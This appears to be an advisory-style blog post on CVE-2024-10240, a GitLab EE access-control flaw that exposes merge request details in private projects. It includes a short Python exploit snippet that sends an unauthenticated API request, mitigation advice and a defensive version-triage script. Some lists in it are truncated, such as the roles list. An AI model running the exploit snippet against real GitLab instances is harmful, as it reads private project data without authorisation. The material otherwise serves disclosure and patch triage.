A recently discovered vulnerability, registered as CVE-2024-10240, impacts GitLab Enterprise Edition (EE) and has the potential to expose sensitive information about merge requests (MRs) in private projects under certain conditions. This post provides an analysis of the vulnerability, including an example code snippet and details about the exploit. It is important to understand the risks associated with this vulnerability and how to mitigate them.
All 17.5 versions before 17.5.2
Users running any of these versions should upgrade to the latest version provided by GitLab to reduce the risk of unauthorized information disclosure.
Vulnerability Details
The vulnerability arises from a flaw in the way GitLab EE handles access control for MRs in private projects. Under certain conditions, an unauthenticated user may gain access to some information about an MR without having the required permissions.
To better understand the vulnerability, let's explore how GitLab EE manages access control for MRs. GitLab utilizes a role-based access control (RBAC) system to manage user permissions. In a typical GitLab project, users are assigned one of the following roles:
Owner
Each role has a predefined set of permissions that dictate what actions a user can perform within a project. In the case of a private project, unauthorized users should not be able to view any information related to MRs.
Exploit Example
Consider a scenario where a GitLab EE instance is hosting a private project with the following details:
Merge request title: "Important Bugfix"
The access control vulnerability allows an unauthenticated user to retrieve some information related to the MR with the following code snippet:
import requests

# GitLab EE instance information (placeholder values)
GITLAB_URL = 'https://your-gitlab-instance.com'
PROJECT_ID = 12345
MERGE_REQUEST_ID = 1

# Unauthenticated GET request against the merge request API endpoint
url = f'{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/merge_requests/{MERGE_REQUEST_ID}'
response = requests.get(url, timeout=10)

# Process the response: on an unpatched instance the request succeeds without credentials
if response.status_code == 200:
    data = response.json()
    print(f"MR title: {data['title']}")
else:
    print(f"Error: Unable to access MR info (HTTP {response.status_code})")
In this example, the code snippet demonstrates how an unauthenticated user can access the title of the MR, despite the project being private.
How to Mitigate
GitLab has released updates that address the vulnerability in each affected version. It is essential that users update their GitLab EE instances to the latest version to protect the sensitive information in their private projects:
Update to GitLab EE 17.5.2 if using 17.5.x versions
Refer to the official GitLab update documentation for detailed instructions on upgrading GitLab EE.
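The following is an added example, not code from the original post or from GitLab, for triaging an inventory of GitLab EE instances against the affected range the post states (all 17.5 releases before 17.5.2). It encodes only that range; versions in any other series are reported as "unknown" rather than guessed, since the post does not list them. The hostnames and versions in the sample inventory are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Affected range as stated in the post: all 17.5 releases before 17.5.2.
# Keyed by (major, minor) series -> first fixed patch version.
# Assumption: the post lists only this series, so anything outside it is
# reported as "unknown" instead of being guessed.
FIXED_VERSIONS: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (17, 5): (17, 5, 2),
}

# GitLab EE reports versions such as "17.5.1-ee"; the suffix is optional here.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-ee)?$")


def parse_version(version: str) -> Optional[Tuple[int, int, int]]:
    """Parse 'MAJOR.MINOR.PATCH' (optionally with an '-ee' suffix) into a tuple."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def assess(version: str) -> str:
    """Return 'affected', 'fixed' or 'unknown' for a GitLab EE version string."""
    parsed = parse_version(version)
    if parsed is None:
        return "unknown"
    fixed = FIXED_VERSIONS.get(parsed[:2])
    if fixed is None:
        return "unknown"  # series not covered by the range the post lists
    # Tuples compare lexicographically, so (17, 5, 1) < (17, 5, 2).
    return "affected" if parsed < fixed else "fixed"


def triage(inventory: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Map {hostname: version} to rows (hostname, version, status), affected first."""
    order = {"affected": 0, "unknown": 1, "fixed": 2}
    rows = [(host, ver, assess(ver)) for host, ver in inventory.items()]
    return sorted(rows, key=lambda r: (order[r[2]], r[0]))


if __name__ == "__main__":
    # Constructed sample inventory (not real hosts or instances).
    sample = {
        "gitlab-prod.example.internal": "17.5.1-ee",
        "gitlab-staging.example.internal": "17.5.2-ee",
        "gitlab-legacy.example.internal": "17.4.3-ee",
        "gitlab-dev.example.internal": "not-a-version",
    }
    for host, ver, status in triage(sample):
        print(f"{status:8s} {host} ({ver})")
```

Feed it the version strings you already collect (for example from each instance's admin area or your configuration management data); "unknown" rows are the ones to check against the vendor advisory by hand, because the post covers only the 17.5 series.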
Conclusion
CVE-2024-10240 is a serious vulnerability that exposes sensitive MR information in private GitLab EE projects to unauthorized users. Users should take immediate action to update their GitLab EE instances to the latest secure version and ensure that their private projects remain secure from unauthorized access.
Timeline
Published on: 11/26/2024 20:15:24 UTC